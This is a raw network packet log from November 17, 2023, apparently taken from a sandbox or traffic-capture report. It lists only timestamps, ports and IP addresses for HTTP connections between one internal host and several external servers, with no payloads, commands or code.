                                                                                                                                                                                                Nov 17, 2023 19:27:21.342120886 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:21.388856888 CET805014538.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:21.389302969 CET5014580192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:21.389405012 CET5014580192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:21.729540110 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:21.730333090 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:21.770385981 CET805014538.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:22.881486893 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:23.263326883 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:23.263884068 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:26.677519083 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:33.504590988 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:33.882402897 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:33.883182049 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:33.883304119 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:34.261250973 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:34.261694908 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:34.638978004 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:34.639368057 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:34.639487028 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:35.016643047 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:35.017117023 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:35.737930059 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:37.175290108 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:40.049578905 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:40.429588079 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:40.429820061 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:40.429905891 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:42.805274010 CET805014538.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:42.805670023 CET5014580192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:42.805726051 CET5014580192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:43.172821999 CET805014538.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:48.630007982 CET5014680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:48.975337982 CET805014634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:48.975749016 CET5014680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:48.975980997 CET5014680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:49.321547031 CET805014634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:49.399677038 CET805014634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:49.453833103 CET5014680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:50.484858990 CET5014680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:51.156523943 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:51.500587940 CET5014780192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:51.547357082 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:51.547640085 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:51.843147039 CET805014734.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:51.843491077 CET5014780192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:51.843705893 CET5014780192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:52.531224012 CET5014780192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:53.289205074 CET805014734.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:53.343619108 CET5014780192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:53.359112978 CET5014780192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:54.374937057 CET5014880192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:54.716670990 CET805014834.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:54.717014074 CET5014880192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:54.718319893 CET5014880192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:54.718415022 CET5014880192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:55.059986115 CET805014834.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:55.060394049 CET5014880192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:55.905519962 CET5014880192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:56.561765909 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:56.939491987 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:56.939743996 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:56.939863920 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:56.939938068 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:57.116523027 CET805014834.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:57.116874933 CET5014880192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:57.249221087 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:57.325249910 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:57.591501951 CET805014934.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:57.591732979 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:57.591856956 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:57.905036926 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:58.010937929 CET805014934.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:58.061300039 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:27:58.483118057 CET5014480192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:27:58.867151976 CET805014438.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:28:13.400398970 CET805014934.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:28:13.400723934 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:28:28.738079071 CET805014934.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:28:28.738264084 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:28:44.073471069 CET805014934.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:28:44.073796988 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:28:59.409914970 CET805014934.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:28:59.410082102 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:29:12.932086945 CET805014934.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:12.932533979 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:29:12.932533979 CET5014980192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:29:13.268826962 CET805014934.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:18.288397074 CET5015080192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:18.504127026 CET8050150194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:18.504529953 CET5015080192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:18.504617929 CET5015080192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:18.719131947 CET8050150194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:18.719985962 CET8050150194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:18.720062971 CET8050150194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:18.721194029 CET8050150194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:18.721240044 CET5015080192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:18.721489906 CET8050150194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:18.722109079 CET5015080192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:20.012134075 CET5015080192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:21.027829885 CET5015180192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:21.250164032 CET8050151194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:21.250400066 CET5015180192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:21.250534058 CET5015180192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:21.467080116 CET8050151194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:21.467825890 CET8050151194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:21.468121052 CET8050151194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:21.468142986 CET8050151194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:21.468159914 CET8050151194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:21.468465090 CET5015180192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:22.761579990 CET5015180192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:23.777141094 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:23.988836050 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:23.989206076 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:23.991671085 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.206368923 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.206479073 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.206640005 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207456112 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207721949 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207732916 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207767010 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207828045 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207900047 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207936049 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.208199978 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.428613901 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.428714991 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.428890944 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.428999901 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.643655062 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.643755913 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.643881083 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.644068003 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.644179106 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.859841108 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.860112906 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.860188007 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:24.905354023 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:24.905688047 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.072329998 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:25.072623014 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.117855072 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:25.118804932 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.118926048 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.288213015 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:25.288446903 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.340945959 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:25.341263056 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.341383934 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.495342970 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.511470079 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:25.511893034 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.566803932 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:25.567120075 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:25.608607054 CET8050152194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:25.608838081 CET5015280192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.511090994 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.724033117 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.724364996 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.724462986 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.938868046 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.938961983 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.939502001 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.939708948 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.939882994 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943531036 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943624973 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943691969 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943738937 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943808079 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943835020 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943835020 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944046021 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944113016 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944212914 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944360018 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944459915 CET5015380192.168.11.20194.58.112.174
                                                                                                                                                                                                Nov 17, 2023 19:29:27.156734943 CET8050153194.58.112.174192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:32.059216976 CET5015480192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:32.228372097 CET8050154198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:32.228656054 CET5015480192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:32.228758097 CET5015480192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:32.397634029 CET8050154198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:32.566328049 CET8050154198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:32.566530943 CET8050154198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:32.566730022 CET5015480192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:33.743431091 CET5015480192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:34.759185076 CET5015580192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:34.928436041 CET8050155198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:34.928754091 CET5015580192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:34.928937912 CET5015580192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:35.097354889 CET8050155198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:35.235759974 CET8050155198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:35.235842943 CET8050155198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:35.236197948 CET5015580192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:36.430546045 CET5015580192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.446064949 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.616852045 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.617075920 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.618518114 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.788898945 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789064884 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789117098 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789160967 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789163113 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789350033 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789450884 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789696932 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789964914 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.790080070 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.790810108 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.791007996 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.959687948 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.959753036 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.959798098 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.959836960 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960114956 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960201025 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960262060 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960426092 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960469007 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960508108 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960731030 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960771084 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.004264116 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.129954100 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.130070925 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.130486012 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.130980015 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.131268024 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.275218964 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.275232077 CET8050156198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:38.275446892 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:39.133021116 CET5015680192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:40.148514986 CET5015780192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:40.318762064 CET8050157198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:40.318934917 CET5015780192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:40.319109917 CET5015780192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:40.488117933 CET8050157198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:40.629862070 CET8050157198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:40.629968882 CET8050157198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:40.630304098 CET5015780192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:40.630398035 CET5015780192.168.11.20198.177.123.106
                                                                                                                                                                                                Nov 17, 2023 19:29:40.801126003 CET8050157198.177.123.106192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:45.776001930 CET5015880192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:45.890621901 CET8050158216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:45.890831947 CET5015880192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:45.891000986 CET5015880192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039764881 CET8050158216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039911032 CET8050158216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039980888 CET8050158216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040133953 CET8050158216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040186882 CET8050158216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040199041 CET5015880192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040241957 CET8050158216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040319920 CET5015880192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040390015 CET5015880192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:47.396847010 CET5015880192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:48.412626028 CET5015980192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:48.527101040 CET8050159216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:48.527501106 CET5015980192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:48.527652979 CET5015980192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:48.687988997 CET8050159216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688020945 CET8050159216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688203096 CET5015980192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688215971 CET8050159216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688643932 CET8050159216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688672066 CET8050159216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688689947 CET8050159216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688915014 CET5015980192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:50.036928892 CET5015980192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.052536011 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.167251110 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.167615891 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.168930054 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.340213060 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.340857983 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.340960979 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.455225945 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.455317974 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.455368042 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.455492020 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.455625057 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.455717087 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.455784082 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.455835104 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.456171036 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.511589050 CET8050160216.40.34.41192.168.11.20
